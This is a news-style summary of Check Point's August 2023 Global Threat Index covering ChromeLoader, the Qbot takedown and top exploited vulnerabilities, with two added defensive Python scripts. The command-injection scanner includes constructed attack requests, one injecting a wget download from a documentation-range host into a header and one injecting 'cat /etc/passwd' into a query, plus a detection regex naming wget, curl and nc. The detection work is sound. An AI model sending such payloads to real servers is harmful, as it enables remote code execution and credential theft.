Check Point Software Technologies Ltd., a provider of global cybersecurity solutions, has released its Global Threat Index for August 2023. Researchers reported a new variant of the ChromeLoader malware, which targets Chrome browser users with fake ads that deliver malicious extensions.
Meanwhile, the communications sector ranked as the second most affected industry globally, displacing healthcare from the list for the first time this year.
ChromeLoader is a persistent Google Chrome browser hijacker first discovered in 2022. It ranks 10th in last month's top malware families and is designed to covertly install malicious extensions, delivered through fake ads, in web browsers.
In the "Shampoo" campaign, victims are tricked into running VBScript files that install malicious Chrome extensions. Once installed, the extensions can collect personal data and disrupt browsing with unwanted ads.
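An extension dropped by a script rather than installed from the Chrome Web Store is the kind of artifact a responder would look for after a ChromeLoader-style infection. The following audit is an added example, not code from Check Point or from the report; it assumes Chrome's on-disk layout of one directory per extension ID and per version under a profile's Extensions folder (on Windows, %LOCALAPPDATA%\Google\Chrome\User Data\Default\Extensions), with a manifest.json in each version directory, and it uses two heuristics that are assumptions of this example: Web Store installs carry the Web Store update_url in their manifest, and hijackers need broad permissions over every page. The sample profile is constructed in a temporary directory so the script runs offline.

```python
"""Heuristic audit of Chrome extension manifests for sideloaded, over-privileged extensions."""
import json
import os
import tempfile

# update_url that Chrome Web Store installs carry in their manifest (assumption of this example).
WEBSTORE_UPDATE_URL = "https://clients2.google.com/service/update2/crx"
# Permissions that let an extension read or rewrite every page the user visits.
RISKY = {"<all_urls>", "webRequest", "webRequestBlocking", "declarativeNetRequest",
         "tabs", "scripting", "http://*/*", "https://*/*", "*://*/*"}


def audit_extensions(extensions_root):
    """Walk <root>/<id>/<version>/manifest.json and return one finding per suspicious extension."""
    findings = []
    for ext_id in sorted(os.listdir(extensions_root)):
        ext_dir = os.path.join(extensions_root, ext_id)
        if not os.path.isdir(ext_dir):
            continue
        for version in sorted(os.listdir(ext_dir)):
            manifest_path = os.path.join(ext_dir, version, "manifest.json")
            if not os.path.isfile(manifest_path):
                continue
            with open(manifest_path, encoding="utf-8") as fh:
                manifest = json.load(fh)
            reasons = []
            if manifest.get("update_url") != WEBSTORE_UPDATE_URL:
                reasons.append("not updated from the Chrome Web Store (likely sideloaded)")
            # Manifest V2 lists host patterns under "permissions", V3 under "host_permissions".
            requested = set(manifest.get("permissions", [])) | set(manifest.get("host_permissions", []))
            risky = sorted(requested & RISKY)
            if risky:
                reasons.append("broad permissions: " + ", ".join(risky))
            if reasons:
                findings.append({"id": ext_id, "version": version,
                                 "name": manifest.get("name", "?"), "reasons": reasons})
    return findings


def build_sample_profile():
    """Create a constructed Extensions directory: one Web Store extension, one sideloaded hijacker."""
    root = tempfile.mkdtemp(prefix="ext-audit-")
    samples = {
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa": ("1.2.0", {
            "manifest_version": 3, "name": "Benign Notes",
            "update_url": WEBSTORE_UPDATE_URL, "permissions": ["storage"]}),
        "bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb": ("0.0.1", {
            "manifest_version": 3, "name": "Chrome Update Helper",  # hypothetical name
            "permissions": ["tabs", "scripting", "storage"],
            "host_permissions": ["<all_urls>"]}),
    }
    for ext_id, (version, manifest) in samples.items():
        path = os.path.join(root, ext_id, version)
        os.makedirs(path)
        with open(os.path.join(path, "manifest.json"), "w", encoding="utf-8") as fh:
            json.dump(manifest, fh)
    return root


if __name__ == "__main__":
    for finding in audit_extensions(build_sample_profile()):
        print(finding["id"], finding["name"], "->", "; ".join(finding["reasons"]))
```

Point audit_extensions at a real profile's Extensions folder to triage a host. One caveat: an extension that Chrome loads unpacked from an arbitrary folder (for example via a modified browser shortcut) never appears under this directory, so a full check also has to review how Chrome is being launched.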
In August, the FBI announced a major victory in its global campaign against Qbot (AKA Qakbot). In "Operation Duck Hunt" the FBI took control of the botnet, removed the malware from infected devices and identified a significant number of affected devices.
Qbot evolved into a malware delivery service used for various cybercriminal activities, including ransomware attacks. It is usually spread through phishing campaigns and collaborates with other threat actors. Although it remained the most prevalent malware in August, Check Point observed a significant reduction in its impact after the operation.
Last month the communications sector also ranked as the second most impacted industry globally, surpassing healthcare for the first time in 2023. There have been many examples of organizations in the sector facing cyberattacks this year. In March, the Chinese state-sponsored cyber espionage group APT41 was observed targeting the telecommunications sector in the Middle East. The threat actors compromised Internet-facing Microsoft Exchange servers to execute commands, conduct reconnaissance, steal credentials, and perform lateral movement and data exfiltration.
"The takedown of QBot was a breakthrough in the fight against cybercrime. However, we cannot be complacent because when one falls, another will eventually rise to take its place," said Maya Horowitz, VP Research at Check Point Software. "We should all remain vigilant, work together and continue to practice good security hygiene across all attack vectors."
Check Point Research (CPR) also revealed that "HTTP Headers Remote Code Execution" was the most commonly exploited vulnerability, affecting 40% of organizations worldwide, followed by "Command Injection Over HTTP", which affected 38% of organizations worldwide. "MVPower CCTV DVR Remote Code Execution" came in third place with a global impact of 35%.
Top malware families
* The arrows refer to the change in ranking compared to the previous month.
Qbot was the most prevalent malware last month with a 5% impact on organizations worldwide, followed by Formbook with a global impact of 4% and Fakeupdates with a global impact of 3%.
↔ Qbot - Qbot, AKA Qakbot, is a multipurpose malware that first appeared in 2008. It was designed to steal a user's credentials, record keystrokes, steal cookies from browsers, spy on banking activities and deploy additional malware. Often distributed through spam email, Qbot uses several anti-VM, anti-debugging and anti-sandbox techniques to hinder analysis and evade detection. Starting in 2022, it emerged as one of the most prevalent Trojans.
↔ Formbook - Formbook is an infostealer targeting the Windows operating system, first detected in 2016. It is marketed as Malware-as-a-Service (MaaS) on underground hacking forums for its strong evasion techniques and relatively low price. FormBook harvests credentials from various web browsers, collects screenshots, monitors and logs keystrokes, and can download and execute files as instructed by its C&C.
↑ Fakeupdates - Fakeupdates (AKA SocGholish) is a downloader written in JavaScript. It writes payloads to disk before launching them. Fakeupdates has led to further compromise by many other malicious programs, including GootLoader, Dridex, NetSupport, DoppelPaymer and AZORult.
Top attacked industries worldwide
Last month education/research remained the number one most attacked industry globally, followed by communications and government/military.
1. Education/Research
2. Communications
3. Government/Military
Top Exploited Vulnerabilities
Last month, "HTTP Headers Remote Code Execution" was the most exploited vulnerability, affecting 40% of organizations worldwide, followed by "Command Injection Over HTTP", which affected 38% of organizations worldwide. "MVPower CCTV DVR Remote Code Execution" was the third most frequently exploited vulnerability, with a global impact of 35%.
↑ HTTP Headers Remote Code Execution (CVE-2020-10826, CVE-2020-10827, CVE-2020-10828, CVE-2020-13756) - HTTP headers let the client and server pass additional information with an HTTP request. A remote attacker could use a vulnerable HTTP header to execute arbitrary code on the victim's machine.
↑ Command Injection Over HTTP (CVE-2021-43936, CVE-2022-24086) - A command injection over HTTP vulnerability has been reported. A remote attacker can exploit this issue by sending a specially crafted request to the victim. Successful exploitation would allow the attacker to execute arbitrary code on the target machine.
↑ MVPower CCTV DVR Remote Code Execution (CVE-2016-20016) - A remote code execution vulnerability exists in MVPower CCTV DVR. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.
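The two most exploited entries above share a shape: attacker-controlled text in an HTTP header or query parameter reaches a command interpreter on the server. The scanner below is an added example written for this page, not Check Point's detection logic, and it is not tied to any of the listed CVEs; it applies a generic heuristic (a shell operator followed by a typical injected command or path) to URL-decoded header and query values of a raw HTTP/1.x request. The three requests it is run on are constructed for the example, and the regular expression is deliberately narrow so that the semicolons in an ordinary User-Agent string do not trigger it.

```python
"""Heuristic scan of raw HTTP requests for command injection in headers and query strings."""
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# A shell operator (or an injected newline) followed by a command or path an attacker
# typically chains in. Plain ";" inside "(Windows NT 10.0; Win64; x64)" does not match
# because "Win64" is not in the command list.
INJECTION_RE = re.compile(
    r"(?:;|\|\|?|&&|`|\$\(|\$\{IFS\}|\n)\s*"
    r"(?:/bin/|/usr/bin/|/tmp/|sh\b|bash\b|wget\b|curl\b|nc\b|busybox\b|"
    r"cat\b|echo\b|rm\b|chmod\b|id\b|uname\b)",
    re.IGNORECASE,
)


def parse_request(raw):
    """Split a raw HTTP/1.x request into (method, target, headers); header names are lowercased."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return method, target, headers


def scan_request(raw):
    """Return (location, decoded value) pairs whose value looks like a command injection."""
    _method, target, headers = parse_request(raw)
    findings = []
    # parse_qsl decodes once; decoding again catches double-encoded payloads.
    for key, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        decoded = unquote_plus(value)
        if INJECTION_RE.search(decoded):
            findings.append(("query:" + key, decoded))
    for name, value in headers.items():
        decoded = unquote_plus(value)
        if INJECTION_RE.search(decoded):
            findings.append(("header:" + name, decoded))
    return findings


# Constructed sample requests (203.0.113.0/24 is a documentation range, not a real host).
BENIGN_REQUEST = (
    "GET /search?q=dvr+firmware&page=2 HTTP/1.1\r\n"
    "Host: example.test\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)\r\n"
    "Accept-Language: en-US,en;q=0.9\r\n\r\n"
)
HEADER_INJECTION = (
    "GET /index.html HTTP/1.1\r\n"
    "Host: example.test\r\n"
    "X-Forwarded-For: 127.0.0.1; wget http://203.0.113.5/a.sh -O /tmp/a.sh\r\n\r\n"
)
QUERY_INJECTION = (
    "GET /cgi-bin/status?host=127.0.0.1%3B%20cat%20%2Fetc%2Fpasswd HTTP/1.1\r\n"
    "Host: example.test\r\n\r\n"
)

if __name__ == "__main__":
    for sample in (BENIGN_REQUEST, HEADER_INJECTION, QUERY_INJECTION):
        print(scan_request(sample) or "clean")
```

The pattern list is a starting point for a log review or a WAF rule, not a complete signature set: it will miss payloads that avoid every listed command, and any broader operator match (a bare ";" for instance) would start flagging legitimate User-Agent and Accept-Language headers, which is why the operator must be followed by a known command or path.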
Top Mobile Malwares
Last month Anubis remained in the top spot as the most prevalent mobile malware, followed by AhMyth and SpinOk.
Anubis - Anubis is a banking Trojan designed for Android mobile phones. Since it was first identified, it has gained additional functions, including Remote Access Trojan (RAT) capabilities, a keylogger, audio recording and various ransomware features. It has been spotted in hundreds of different apps available on the Google Play Store.
AhMyth - AhMyth is a Remote Access Trojan (RAT) discovered in 2017. It is distributed via Android apps found in app stores and on various websites. When a user installs one of these infected apps, the malware can collect sensitive information from the device and perform actions such as keylogging, taking screenshots, sending SMS messages and activating the camera, all of which are commonly used to steal sensitive information.
SpinOk - SpinOk is an Android software module that acts as spyware. It collects information about files stored on the device and can transfer it to threat actors. The malicious module was found in more than 100 Android applications and had been downloaded more than 421,000,000 times as of May 2023.
Check Point Software's Global Threat Impact Index and ThreatCloud Map are based on the company's ThreatCloud intelligence, which provides real-time threat intelligence derived from hundreds of millions of sensors worldwide, across networks, endpoints and mobile phones. ThreatCloud intelligence is enriched with AI-based engines and exclusive research data from Check Point Research, the Intelligence & Research arm of Check Point Software Technologies.
The full list of the top 10 malware families in August 2023 can be found on the Check Point blog.
